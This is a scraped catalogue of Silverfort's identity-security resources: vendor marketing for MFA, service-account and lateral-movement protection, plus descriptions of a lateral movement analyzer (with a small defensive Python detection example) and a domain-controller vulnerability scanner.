In this case study you’ll learn:

- How a Silverfort customer's AD environment was subject to a lateral movement attack that involved the compromise of two admins and a service account.
- How the MFA and service account protection policies were able to block this attack as it started, preventing severe damage.
- How the customer used Silverfort to conduct a rapid and efficient response and remediation process

---

- Published: 2023-01-04
- Modified: 2024-10-03
- URL: https://www.silverfort.com/resources/accelerate-your-privileged-access-management-pam-journey/

Privileged Access Management (PAM) products are the go-to solution for many organizations that seek to secure their administrative accounts against credential compromise.
This need applies equally to human admins and to Active Directory service accounts. However, PAM deployment and onboarding can become a years-long process, creating a continuous security gap. Download this Solution Brief to learn:
- How Silverfort’s automated service account discovery radically shortens PAM onboarding time.
- How Silverfort protects the PAM itself from being compromised.
- How Silverfort provides real-time protection to all the privileged accounts that you choose to leave outside of the PAM’s vault.

---
- Published: 2023-01-03
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/silverfort-microsoft-azure-ad-extending-azure-mfa-to-unprotected-systems/

Silverfort offers a native integration with Entra ID (formerly Azure AD) that extends Entra ID security controls to all resources within the hybrid environment, whether they’re on-prem or in the cloud. Download this PDF to learn how to:
- Extend Azure MFA to on-prem legacy applications, command-line access to workstations and servers, and other resources that couldn’t be protected with MFA before.
- Identify and mitigate identity-based attacks across your on-prem and multi-cloud environment.
- Provide users with a consistent and familiar experience when accessing any resource, both on-prem and in the cloud.

---
- Published: 2022-12-28
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/extending-azure-ad-mfa-and-conditional-access-to-on-prem-resources/

The strategic integration of Silverfort and Azure AD enables organizations to extend Azure AD security controls to all resources within the hybrid environment, whether they’re on-prem or in the cloud. Download this PDF to learn how to:
- Extend Azure AD and MFA to any asset, including legacy apps, IT infrastructure, and command-line tools.
- Identify and mitigate identity-based attacks across your on-prem and multi-cloud environment.
- Provide users with a consistent and familiar experience when accessing any resource, both on-prem and in the cloud.

---
- Published: 2022-12-27
- Modified: 2025-04-14
- URL: https://www.silverfort.com/resources/silverfort-microsoft-365-defender-unified-xdr-identity-threat-protection/

Today’s data breaches and ransomware attacks often include two key components: exploiting the endpoint and using compromised credentials to move laterally to additional resources. Silverfort and Microsoft have joined forces to deliver unmatched real-time detection and prevention of identity threats in a unified manner, across all resources and environments. Download this PDF to learn how to:
- Extend Azure MFA to on-prem legacy applications, command-line access to workstations and servers, and other resources that couldn’t be protected with MFA before.
- Prevent compromised users from accessing resources, while allowing legitimate users to prove their identity and avoid interruption.
- Enforce granular authentication and access policies for any access to corporate resources, based on the user’s risk.

---
- Published: 2022-11-30
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-duo-extending-mfa-to-corporate-resources-that-couldnt-be-protected-before/

This solution brief explores how Silverfort’s native integration with Duo extends MFA protection to previously unprotectable parts of your infrastructure, like legacy applications, command-line tools, internal admin access, and more.
By acting as a control point across both cloud and on-prem environments, Silverfort evaluates every access request in real time. When risk is detected, it triggers Duo to prompt MFA—no changes, no delays. This means you get enterprise-wide identity protection with less overhead and a smoother user experience. It’s MFA for every user, every session, and every resource—without the fatigue, friction, or complexity. In this PDF, you’ll learn how to: Extend Duo MFA everywhere—including legacy systems, file shares, and command-line tools. Enforce risk-based access so MFA is only triggered when suspicious behavior is detected. Deploy fast and friction-free using Silverfort’s unique architecture. Download the PDF and discover how Silverfort and Duo help you stop identity threats at every access point—no matter how old, hidden, or hybrid. --- - Published: 2022-11-23 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-rsa-extends-mfa-protection-to-all-resources-in-the-cloud-and-on-prem/ RSA SecurID is powerful—but what if it could also protect legacy apps, scripts, and servers that were never designed for MFA? That’s exactly what Silverfort delivers. This PDF explores how the Silverfort + RSA integration lets you extend RSA’s proven MFA to all access points in your environment—on-prem or in the cloud. From PowerShell and PsExec to RDP, file shares, and internal admin tools, no system is left behind. Silverfort evaluates every authentication request in real time, determines whether MFA is warranted, and triggers RSA SecurID when needed. The result? Full-spectrum protection, without rewriting a single line of code or deploying agents. Whether you’re modernizing identity security or closing Zero Trust gaps, this guide will show you how to get more out of your RSA investment. In this PDF, you’ll learn how to: Apply RSA MFA everywhere, even on legacy systems and command-line tools. 
Use adaptive MFA based on real-time risk signals—so users are only prompted when it matters. Deploy seamlessly with unique architecture for rapid coverage. Download the PDF now and discover how Silverfort makes RSA SecurID stronger, smarter, and enterprise-wide. --- - Published: 2022-09-21 - Modified: 2024-10-22 - URL: https://www.silverfort.com/resources/the-critical-role-of-identity-in-zero-trust-security/ The Zero Trust approach to cyber security was formulated to defend all users and applications from Internet and identity-based attacks. It also relies on multiple components to deliver maximum protection, including identity management, access control, threat detection and response, multi-factor authentication and threat intelligence as well as ongoing monitoring and analysis. Managing and configuring all of those separate tools across different on-prem and cloud hosted systems and environments can be complex and time consuming for IT departments though, so what’s the best way to apply suitable policies both at the perimeter and inside the network to minimize the risk of being breached? To help answer the question, check out this webinar where we will: Define the Zero Trust approach to cyber security and consider how it can deliver better protection than perimeter solutions, with reference to recent examples of successful cyber attacks which evaded existing defenses. Analyze the role that identity management plays in that Zero Trust Architecture and discuss the importance of giving IT departments sufficient visibility and control over the policies and frameworks they put in place. Provide a detailed breakdown of how Silverfort’s unified identity protection platform builds an end to end Zero Trust architecture which monitors and enforces access policies for any user and system spanning both on-prem and cloud environments. 
Outline a real-world implementation of Silverfort’s platform by a customer from start to finish, detailing the additional cyber security protection it provided them.

---
- Published: 2022-09-20
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/leading-manufacturer-averted-lateral-movement/

Identity Protection: A Top Priority. This case study discusses a supply chain cyber incident in which a leading manufacturer was attacked by nation-state actors attempting to move laterally from a compromised factory network into the manufacturer’s domain environment, via laptops that were maliciously accessed while several of the company’s employees were visiting the factory. Fortunately, the manufacturer’s security team was able to thwart the attack by using Silverfort’s capabilities to prevent, detect, and respond to identity threats that use compromised credentials to access targeted resources. In this case study you’ll learn about:
- Typical supply chain risks in the interconnected cyber space
- A new lateral movement flavor that traverses between different organizations
- Mitigating the risk of NTLM authentications with Silverfort policies
- Utilizing Silverfort’s logs for early threat detection

---
- Published: 2022-09-08
- Modified: 2024-09-06
- URL: https://www.silverfort.com/resources/lateral-movement-analyzer-tool-beta/

Description

The Lateral Movement Analyzer tool (beta) enables security teams to hunt for active lateral movement in their environments. The tool analyzes AD authentication traffic offline and provides actionable output on the accounts suspected of having been compromised and the machines those accounts accessed. Routine use of this tool can significantly assist in detecting lateral movement at its earliest stages and taking the actions required to remove malicious entities from the environment.

Details

The tool includes two modules: the Collector, which gathers authentication logs from the environment, and the Analyzer, which analyzes these logs to detect authentication anomalies associated with lateral movement patterns.

Collector

The Event Log Collector module gathers authentication logs as follows:
- NTLM authentications: scanning Domain Controllers for Windows event 8004 (NTLM auditing, Microsoft-Windows-NTLM/Operational log; this event is only written when NTLM auditing is enabled on the DCs).
- Kerberos authentications: scanning client machines for Windows event 4648 (logon attempted with explicit credentials, Security log).

Requirements:
- Domain Admin privileges.
- LDAP/S and RPC access to the DCs and clients.
- A Windows machine with Python 3.8 or above.

Output: a CSV file with the following fields: source host, destination, username, auth type, SPN and timestamp, in the format %Y/%m/%d %H:%M.

Analyzer

The Analyzer operates on the data the Collector provides, searching for lateral movement patterns using the following methods:
- Lateral Movement Analyzer (LATMA) algorithm: an enhancement of the Hopper algorithm to detect anomalous user authentications.
- Lateral movement IoCs: starting from the anomalous authentications LATMA flags, the analyzer searches for authentication sequences and patterns that indicate an active lateral movement is taking place.

Requirements: the Analyzer can be executed from both Windows and Linux machines.

Output:
- A text file containing a list of compromised user accounts and machines, and a line-by-line description of the suspected attack.
- A GIF file with a full visualization of the suspected attack flow.

The beta version is available for download below.
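A small worked example of the kind of sequence analysis the Analyzer step describes, run over constructed Collector-style rows. This is an added illustration, not Silverfort’s LATMA code: it does not reproduce the Hopper-based anomaly scoring, the column names in the sample CSV follow the field list above but their exact spelling is an assumption, and the one-hour window and hop/fan-out thresholds are arbitrary. It shows two patterns a hunter looks for in such data: hop chains, where one account authenticates from A to B and then from B to C within a short window, and fan-out, where one account reaches many distinct hosts in a short window.

```python
"""Added example: hunt for lateral-movement sequences in Collector-style CSV rows.

Not Silverfort's LATMA code. Column names follow the field list in the
Collector section; the exact header spelling and the thresholds are assumptions.
"""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

TS_FORMAT = "%Y/%m/%d %H:%M"   # the Collector's timestamp layout

# Constructed sample rows (not real telemetry): a backup service account is
# driven from a workstation to WS-BOB, from there to SQL01, then on to DC01.
SAMPLE_CSV = """\
source host,destination,username,auth type,SPN,timestamp
WS-ALICE,FS01,alice,Kerberos,cifs/FS01,2023/01/10 09:02
WS-ALICE,MAIL01,alice,Kerberos,HTTP/MAIL01,2023/01/10 09:15
WS-BOB,WS-BOB,bob,NTLM,,2023/01/10 09:20
WS-ALICE,WS-BOB,svc_backup,NTLM,,2023/01/10 10:00
WS-BOB,SQL01,svc_backup,NTLM,,2023/01/10 10:07
SQL01,DC01,svc_backup,Kerberos,cifs/DC01,2023/01/10 10:19
WS-CAROL,FS01,carol,Kerberos,cifs/FS01,2023/01/11 08:30
"""


def load_auths(text):
    """Parse Collector-style CSV text into dicts sorted by timestamp."""
    auths = []
    for row in csv.DictReader(io.StringIO(text)):
        auths.append({
            "src": row["source host"].upper(),
            "dst": row["destination"].upper(),
            "user": row["username"],
            "auth": row["auth type"],
            "spn": row["SPN"],
            "ts": datetime.strptime(row["timestamp"], TS_FORMAT),
        })
    auths.sort(key=lambda a: a["ts"])
    return auths


def _remote_hops_by_user(auths):
    """Group network (non-local) authentications per account, time-ordered."""
    by_user = defaultdict(list)
    for a in auths:
        if a["src"] != a["dst"]:          # a local logon is not a hop
            by_user[a["user"]].append(a)
    return by_user


def find_hop_chains(auths, window=timedelta(minutes=60), min_hops=2):
    """Return maximal chains A->B, B->C, ... for one account, where each hop
    starts from the host the previous hop reached and follows it within
    `window`. Only chains of at least `min_hops` hops are reported."""
    chains = []
    for events in _remote_hops_by_user(auths).values():
        consumed = set()                  # events already explained by a chain
        for i, first in enumerate(events):
            if id(first) in consumed:
                continue
            chain = [first]
            for nxt in events[i + 1:]:
                last = chain[-1]
                if nxt["src"] == last["dst"] and nxt["ts"] - last["ts"] <= window:
                    chain.append(nxt)
            if len(chain) >= min_hops:
                chains.append(chain)
                consumed.update(id(e) for e in chain)
    return chains


def find_fan_out(auths, window=timedelta(minutes=60), min_targets=3):
    """Return {user: max distinct destinations reached within any `window`}
    for accounts that hit at least `min_targets` hosts in that time."""
    flagged = {}
    for user, events in _remote_hops_by_user(auths).items():
        best = 0
        for i, start in enumerate(events):
            targets = {e["dst"] for e in events[i:] if e["ts"] - start["ts"] <= window}
            best = max(best, len(targets))
        if best >= min_targets:
            flagged[user] = best
    return flagged


def describe(chain):
    """Analyzer-style line-by-line description of one suspected chain."""
    user = chain[0]["user"]
    return [f"{user}: {e['src']} -> {e['dst']} ({e['auth']}, {e['ts'].strftime(TS_FORMAT)})"
            for e in chain]


if __name__ == "__main__":
    data = load_auths(SAMPLE_CSV)
    for chain in find_hop_chains(data):
        print("\n".join(describe(chain)))
    for user, n in find_fan_out(data).items():
        print(f"{user}: reached {n} distinct hosts within one hour")
```

On the sample data the only chain is svc_backup’s WS-ALICE -> WS-BOB -> SQL01 -> DC01, and svc_backup is also the only account that fans out to three hosts in an hour; alice’s two file-share and mail authentications from her own workstation are not chained because neither starts from a host she previously reached. In real data the same logic is a triage aid, not a verdict: jump hosts and administrative tooling produce legitimate chains, which is why the real Analyzer layers anomaly scoring on top.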
---
- Published: 2022-08-09
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/agilisys-and-silverfort-case-study/

Extending MFA Protection Across All Environments: Agilisys was looking to ensure sufficient MFA protection for all its environments and interfaces, including those that could not previously be protected. With Silverfort, they secured all their on-prem resources and legacy apps within a month. In this case study you’ll learn:
- How privileged accounts were secured
- How all Active Directory resources were protected
- How MFA was applied to command-line access interfaces such as PowerShell

---
- Published: 2022-07-31
- Modified: 2025-04-28
- URL: https://www.silverfort.com/resources/zol-and-silverfort-a-case-study/

When ZOL hospital in Belgium needed to protect its service accounts from attack with minimal disruption, it turned to Silverfort. https://vimeo.com/741624853

---
- Published: 2022-07-31
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/rwc-and-silverfort-a-case-study/

Reliance Worldwide Corporation (RWC) is a publicly traded leading manufacturer. Like many companies of its size, RWC cannot afford production delays caused by a ransomware attack. That’s why it implemented Silverfort’s solution to extend MFA to Entra ID (formerly Azure AD) and command-line interfaces, gaining the ability to prevent the kind of damage a ransomware attack coupled with lateral movement could cause. https://www.youtube.com/watch?v=mC7Mm4-Z8OY

---
- Published: 2022-07-24
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-app-for-splunk/

The Silverfort App for Splunk brings advanced identity threat intelligence directly into your SOC’s existing workflows. This PDF breaks down how Silverfort enhances Splunk with deep visibility into authentication activity, denied MFA events, and identity-based attacks like Pass the Hash, Kerberoasting, brute force attempts, and lateral movement.
Instead of combing through logs from multiple IdPs and tools, your team gets a unified view of identity threats—complete with rich visualizations, attack context, and prioritized risk scores. The result? Faster investigations, clearer insights, and more decisive responses. If your team uses Splunk and you're serious about stopping identity-based attacks, this integration is a must. In this PDF, you’ll learn how to: Gain real-time alerts on concrete identity threats across cloud and on-prem environments. Accelerate investigations with detailed dashboards and forensic data on users, systems, and attack types. Deliver a consistent SOC experience by integrating identity threat intelligence into your native Splunk environment. Download the PDF now to see how Silverfort and Splunk deliver identity threat detection that’s smart, fast, and fully operational. --- - Published: 2022-07-24 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/whitepaper-service-accounts-best-practices/ Your service accounts are a security blind spot. Here’s how to fix that. Service accounts are critical. They’re also one of the least protected parts of your identity infrastructure. This white paper explains why these non-human identities—used by systems and applications to communicate—are high-value targets for attackers, and how most organizations unknowingly leave them wide open to compromise. We lay out a practical, step-by-step guide for securing service accounts across hybrid environments, so you can learn how to automatically discover every account, understand how they’re being used, assess risk, and enforce least-privilege access—without disrupting your operations. Whether you're starting from scratch or optimizing an existing strategy, this guide will help you reduce risk, prevent lateral movement, and shrink your attack surface. 
In this white paper, you’ll learn how to:
- Discover and inventory all service accounts, including machine-to-machine, hybrid, scanner, and dormant accounts.
- Prioritize protection based on risk, privilege, and usage patterns using built-in Silverfort insights.
- Automate policy enforcement with smart rules and integrations (like ServiceNow and REST APIs).
Download the white paper and start taking control of your most overlooked security gap, before attackers do.

---
- Published: 2022-07-24
- Modified: 2025-02-27
- URL: https://www.silverfort.com/resources/the-essential-eight-maturity-model/

This whitepaper specifies how organisations can use the Silverfort Unified Identity Protection platform to implement the identity protection aspects of the Essential Eight Maturity Model framework, per its October 2021 update. Download this whitepaper to learn:
- What is the Essential Eight Maturity Model?
- What parts of the Essential Eight does Silverfort address?
- What protection do the mitigations provide?

---
- Published: 2022-07-24
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-sentinelone-identity-threat-protection/

What if your XDR platform could detect identity-based threats, and your identity tools could respond to endpoint attacks? With Silverfort and SentinelOne, that’s no longer a “what if.” This PDF breaks down how the two platforms integrate to deliver unified protection across both the endpoint and identity attack surfaces. Whether it’s fileless malware or lateral movement using compromised credentials, Silverfort and SentinelOne detect and shut it down in real time, before damage is done. Silverfort alerts SentinelOne to identity-based anomalies (like brute force or denied authentications), triggering autonomous response at the endpoint. Likewise, SentinelOne flags suspicious endpoint behavior, prompting Silverfort to enforce risk-based access policies.
It’s proactive, bi-directional protection that strengthens your Zero Trust posture without slowing operations. In this PDF, you’ll learn how to: Stop lateral movement by correlating identity threats and endpoint behavior in real time. Accelerate investigations with full visibility into process execution and authentication trails. Enforce adaptive MFA and block access to high-risk resources based on live threat context. Download the PDF now to see how Silverfort and SentinelOne deliver powerful identity + endpoint protection that’s smarter, faster, and built for today’s threats. --- - Published: 2022-07-24 - Modified: 2025-07-28 - URL: https://www.silverfort.com/resources/silverfort-for-windows-login/ Protect every Windows login with adaptive MFA from Silverfort If attackers can log in, they can break in. So why not strengthen your defenses at the very first step—Windows logon? This solution brief reveals how Silverfort adds a powerful layer of protection to every Windows authentication across your organization without requiring extra infrastructure. By operating at the authentication protocol level, Silverfort enables real-time MFA enforcement for both domain-based and local logins, whether on a physical machine, virtual environment, or even offline system. With risk-based policies, geo-fencing, and offline OTP or FIDO2 token support, Silverfort gives organizations precise control over who can log in, from where, and under what conditions. From RDP to UAC prompts, Silverfort secures every access point, stopping compromised credentials, brute force attempts, and malicious lateral movement in its tracks. In this PDF, you’ll learn how to: Apply MFA to any Windows login, including Remote Desktop and offline machines, with policy-based control. Deploy adaptive security policies like geo-restrictions, risk-based triggers, and access blocks at the device layer. Gain deep visibility with audit-ready authentication logs and detailed tracking of user activity. 
Download the PDF to learn how Silverfort transforms Windows logon into a proactive line of identity defense built for today’s hybrid workforce. --- - Published: 2022-07-24 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/help-your-clients-qualify-for-cyber-insurance-coverage-with-silverfort/ Silverfort enables clients to easily meet the new cyber insurance requirements for MFA protection across all sensitive systems, both on-prem and in the cloud, including legacy systems and admin interfaces that couldn’t be protected before. Download this solution brief to learn how Silverfort: Empowers brokers to help clients comply with specific MFA requirements Offers a dedicated program to incentivize insurance brokers to grow their business. Extends MFA to any resource and access interface across the on-prem and multi-cloud enterprise environment. --- - Published: 2022-07-24 - Modified: 2024-09-06 - URL: https://www.silverfort.com/resources/implementing-mfa-for-cyber-insurance-made-easy-with-silverfort/ The new requirement for MFA protection introduces a severe challenge to organizations of all sizes since standard MFA solutions cannot deliver the required coverage. Silverfort is the only solution that can consolidate compliance with the full cyber insurance MFA checklist, without requiring agents or proxies, making it an ideal choice for any organization that seeks to purchase or renew its cyber insurance policy. Download this solution brief to learn how Silverfort: Empowers organizations to implement cyber liability policies by checking off all the MFA requirements. Offers MFA access control on all on-prem and cloud resources in production environments to proactively prevent ransomware attacks. Helps apply MFA protection capabilities that natively integrate with all your identity providers, rather than applying agents or proxies. 
---
- Published: 2022-07-20
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-hypr-extending-passwordless-mfa-to-all-resources-within-your-environments/

What if you could apply HYPR’s passwordless MFA to every app, server, and command-line tool, without touching a single one? The Silverfort + HYPR integration brings modern, phishing-resistant authentication to the legacy and hybrid systems that previously couldn’t be protected. Think PowerShell, PsExec, on-prem servers, file shares, RDP sessions, you name it. Silverfort’s platform evaluates every access request in real time. When risk is detected, it prompts HYPR to issue a passwordless MFA challenge through its mobile app. The result? Seamless security across your entire environment, without disrupting users or rewriting apps. This solution brief walks you through how it works, why it matters, and how to make passwordless identity protection truly universal. In this PDF, you’ll learn how to:
- Extend HYPR passwordless MFA to all resources, on-prem, cloud, and everything in between.
- Leverage context-aware access policies that trigger MFA only when risk is detected.
- Unify identity security across your organization with real-time enforcement and zero disruption.
Download the PDF now and discover how Silverfort and HYPR are redefining what’s possible with passwordless security.

---
- Published: 2022-07-06
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/indosat-and-silverfort-a-case-study/

IndoSat explains how Silverfort addresses its concerns about identity-based attacks by providing continuous visibility and real-time risk analysis across all its network resources, including those previously thought unprotectable. https://www.youtube.com/watch?v=lS7OptU4-88

---
- Published: 2022-07-06
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/privileged-accounts-protection-reborn-with-silverfort/

Creating easily implemented MFA policies for all your privileged accounts is the only way to ensure they are not compromised. With no need for customizations or network segmentation dependencies, you can be up and running within minutes. Download this brief to learn:
- Why a PAM vault is no longer sufficient for privileged account protection
- How to easily apply MFA to privileged accounts
- How Silverfort complements your existing PAM solution

---
- Published: 2022-03-09
- Modified: 2025-02-22
- URL: https://www.silverfort.com/resources/egan-and-silverfort-a-case-study/

In this testimonial from Egan, they discuss how Silverfort enabled them to extend their coverage to assets that could not be protected until today, such as homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access and more. Silverfort continuously monitors all access by users and service accounts across both cloud and on-premises environments, analyzes risk in real time using an AI-based engine, and enforces adaptive authentication and access policies. Silverfort allows organizations to prevent data breaches, achieve compliance, reduce costs and simplify cloud migration. End to End MFA and Service Account Protection: https://youtu.be/L_PkXAd7UFo

---
- Published: 2022-02-20
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/webinar-the-journey-to-identity-centric-zero-trust-architecture/

More and more organizations acknowledge the implementation of Zero Trust in the identity control plane as the best protection against compromised-credential attacks on on-prem and cloud resources. However, the way to achieve true identity-based Zero Trust is not always clear.
Join Abbas Kudrati, APAC Chief Cybersecurity Advisor of Microsoft, and Hed Kovetz, Co-Founder and CEO of Silverfort, as they discuss: How Identity-Centric Zero Trust transforms and elevates organizations’ security posture The difference between Identity vs Network-centric Zero Trust models The typical challenges organizations face in their Zero Trust journey How to resolve legacy authentication protocol and legacy application authentication challenges in your Zero Trust journey Real-life examples of attacks prevented by having Identity-Centric Zero Trust in place --- - Published: 2022-02-09 - Modified: 2024-11-05 - URL: https://www.silverfort.com/resources/cyber-insurance-ebook/ Everyone knows the value of cyber insurance but keeping up with cyber insurance requirements can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. We’re here to help you make sense of what you’ll need. This eBook explains: What types of MFA are required for cyber liability insurance How to evaluate cyber insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network --- - Published: 2022-01-24 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/silverfort-mfa-protect-the-unprotectable-white-paper/ The Silverfort MFA solution represents a fundamentally different approach to identity protection, providing MFA coverage to all enterprise resources – including those previously considered unprotectable – without agents or proxies. This white paper will demonstrate how you can: Extend MFA protection to ALL enterprise resources – without blind spots! 
Address a wide array of MFA use cases. Integrate with all on-prem and cloud directories by means of a single solution.

---
- Published: 2021-12-08
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/mas-risk-management-guidelines-silverfort-white-paper/

The Monetary Authority of Singapore has revised its risk management guidelines to reduce the risk of identity-based attacks. Financial institutions will need to comply, and compliance is not a trivial matter. Silverfort is uniquely positioned to help institutions comply with the identity protection aspects of the new MAS guidelines. This white paper explains how you can:
- Extend MFA to resources that could never before be protected, without agents or proxies
- Provide real-time risk scoring for all authentications and access attempts
- Enforce both rule-based and adaptive risk-based access policies to ensure that accounts aren’t compromised

---
- Published: 2021-10-24
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ebook/

MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. Download this eBook to learn:
- What are the security gaps in traditional MFA solutions?
- How can you assess your existing MFA protection to better understand your risk exposure?
- How can you gain end-to-end MFA coverage for all your cloud and on-prem resources?

---
- Published: 2021-08-10
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/rethinking-ransomware-protection/

Learn why ransomware propagation is often a blind spot for today’s security products, and how emerging Unified Identity Protection technology can proactively prevent such propagation. This eBook will explain:
- Why propagation is the most critical stage in a ransomware attack
- What makes this propagation a blind spot for today’s security products
- How Silverfort’s Unified Identity Protection platform proactively prevents ransomware propagation

---
- Published: 2021-07-27
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/unified-risk-analysis-ping-id/

Silverfort’s Unified Risk Analysis across cloud and hybrid environments detects and prevents identity-based attacks with comprehensive risk analysis and adaptive policies. Download this brief to understand how Silverfort can help with:
- End-to-end identity protection with Ping Identity
- Risk analysis based on the full context of user activity
- Risk-based authentication and zero trust policies

---
- Published: 2021-07-05
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/mfa-not-just-for-admins/

Many believe that MFA is needed only for privileged accounts. This misconception can have far-reaching consequences, as recent events have demonstrated that only a full MFA deployment across all organizational assets can block potential attackers.
Download this brief to learn, from recent real-life attacks, how to:
- Recognize attacks by those logging in with legitimate yet compromised credentials
- Discover and monitor anomalous behavior from service accounts
- Detect lateral movement within a hybrid network

---
- Published: 2021-07-05
- Modified: 2024-09-26
- URL: https://www.silverfort.com/resources/discover-critical-identity-vulnerabilities/

Domain Controllers are the nerve system of your enterprise and a core part of your infrastructure, which makes them a target of choice for threat actors. Ensuring that your DCs do not contain vulnerabilities that expose them to compromise is a key part of your resilience to cyberattacks. Silverfort’s Vulnerability Assessment Tool scans your domain, detects all domain controllers and assesses whether your domain is exposed to these critical identity-based vulnerabilities:
- Zerologon (CVE-2020-1472)
- Bronze Bit (CVE-2020-17049)
- Print Spooler vulnerabilities: CVE-2021-1675 and CVE-2021-34527 (PrintNightmare), and CVE-2021-34481
- LDAP relay
- PetitPotam (PSPKI Audit)
- KDC spoofing

Disclaimers and Tool Security

Silverfort’s Vulnerability Assessment Tool uses public methods to scan for and identify vulnerabilities remotely. It uses the LDAP protocol to detect all domain controllers; because of the sensitivity of this data, LDAPS (LDAP over TLS) is required by default. The tool requires Domain Admin privileges in order to access the domain controllers over WMI and collect the information needed to estimate their exposure status. The information collected by the tool is stored locally and is not sent out.

BY DOWNLOADING OR ACCESSING THE VULNERABILITY ASSESSMENT TOOL SOFTWARE (“SOFTWARE”), YOU ACCEPT THE TERMS OF SERVICE IN THIS LINK AND AGREE TO BE BOUND BY THEM. IF YOU DO NOT ACCEPT OR AGREE WITH THESE TERMS OF SERVICE, PLEASE DO NOT DOWNLOAD OR ACCESS THE SOFTWARE.

How to use the tool
1. Download the Silverfort Vulnerability Assessment Tool.
2. Run SFDetector.exe from any Windows computer with network access to the domain controllers. If you are not yet logged in as a Domain Admin, select “Run as different user” and enter your Domain Admin credentials and the domain’s fully qualified domain name (FQDN).
3. Choose the desired vulnerabilities (all are checked by default).
4. Press Run and wait for the assessment to finish; a CSV output file with the results of the assessment will be created in the folder you ran the tool from.

If you would like to see this tool assess additional vulnerabilities, or to provide feedback, please reach out to info@silverfort.com

---
- Published: 2021-06-20
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/introducing-unified-identity-protection-german/

Watch this short video (with German subtitles) about Unified Identity Protection, the first security solution that is purpose-built to secure modern enterprises against identity-based attacks. This includes unauthorized access to sensitive resources, the spread of malware via lateral movement, and more. By Hed Kovetz, CEO and Co-Founder at Silverfort.

---
- Published: 2021-05-25
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/improving-cybersecurity-with-unified-identity-protection/

Following recent cybersecurity incidents such as SolarWinds, Microsoft Exchange, and the Colonial Pipeline incident, President Biden signed an Executive Order (EO) on May 12, 2021 to improve the nation’s cybersecurity and protect federal government networks.
Silverfort’s Unified Identity Protection platform is uniquely positioned to help agencies and enterprises address three main requirements laid out in the recent US Executive Order on cybersecurity. Download this brief to understand how Silverfort can help with:

- Establishing multi-factor, risk-based authentication and conditional access across the enterprise
- Prioritizing resources for the adoption and use of cloud technology
- Developing a plan to implement Zero Trust Architecture

---

- Published: 2021-05-05
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/can-you-block-lateral-movement-in-real-time-3/

Watch the on-demand webinar to learn the difference between standard and advanced attacks, and why security solutions often fail to detect and prevent these attacks.

Did you know that lateral movement attacks leverage compromised credentials to propagate through the network and gain access to target resources? In this recorded webinar, we explain these attacks and the use of compromised credentials in their various steps, the difference between standard and advanced attacks, and why security solutions often fail to detect and prevent them. Finally, we explain how Silverfort’s cutting-edge identity platform can detect and block these attacks.

Topics covered:

- What are the most common lateral movement attacks
- The identity and security aspects of lateral movement
- Why security products often fail to prevent lateral movement
- How Silverfort’s Unified Identity Protection platform eliminates different types of lateral movement attacks in real time

Speakers:

- Yiftach Keshet, Director of Product Marketing at Silverfort. Yiftach Keshet leads the Product Marketing at Silverfort. Prior to joining Silverfort he served in various Product Management and Product Marketing roles with cybersecurity market leaders such as Microsoft, Palo Alto Networks and Team8.
- Gal Sadeh, Chief Data Scientist at Silverfort. Gal is Chief Data Scientist in Silverfort’s research team.
He is responsible for big data analytics and developing AI engines. He joined Silverfort after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a Master's in Mathematics and Computer Science from Tel Aviv University.

---

- Published: 2021-02-28
- Modified: 2025-05-27
- URL: https://www.silverfort.com/resources/silverfort-unified-identity-protection-overview/

The Silverfort Identity Security Platform closes critical identity security gaps that traditional solutions cannot address. By leveraging our patented Runtime Access Protection™ (RAP) technology, Silverfort natively integrates with your entire Identity and Access Management (IAM) stack—including Active Directory, cloud IdPs, SaaS, and IaaS—without requiring any changes to infrastructure.

The platform offers comprehensive visibility and control over all human and non-human identities (NHIs). It enables organizations to detect, analyze, and mitigate identity risks in real time, proactively stopping lateral movement, privilege escalation, and ransomware attacks before they happen. Key capabilities include:

- Universal MFA enforcement, extending protection to legacy systems and interfaces where MFA was previously impossible.
- Real-time threat detection and policy-based blocking of malicious access without disrupting business operations.
- Just-in-Time access policies for privileged users to minimize excessive access and prevent misuse.

Silverfort’s unique architecture allows security teams to automatically discover and classify all identities, monitor access behaviors across environments, and enforce security controls seamlessly. Trusted by 1,000+ organizations globally, it delivers maximum security with minimal friction, reducing attack surfaces and simplifying identity security at scale.
Get the Silverfort Identity Security Platform overview to:

- Discover how Silverfort’s patented RAP technology enables true end-to-end identity security without changes to infrastructure.
- Learn how we discover and secure all identities—human and non-human, on-prem and in the cloud—with full observability and control.
- Explore how organizations like Kayak, Singtel, and RWC are using Silverfort to protect their businesses.

---

- Published: 2021-02-22
- Modified: 2024-09-08
- URL: https://www.silverfort.com/resources/thank-you-page-why-service-accounts-and-machine-to-machine-access-should-be-part-of-any-zero-trust-initiative/

With hundreds or even thousands of unsupervised, highly privileged service accounts running in any modern organization, and given the difficulties of securing them, they often become a prime target for attackers.

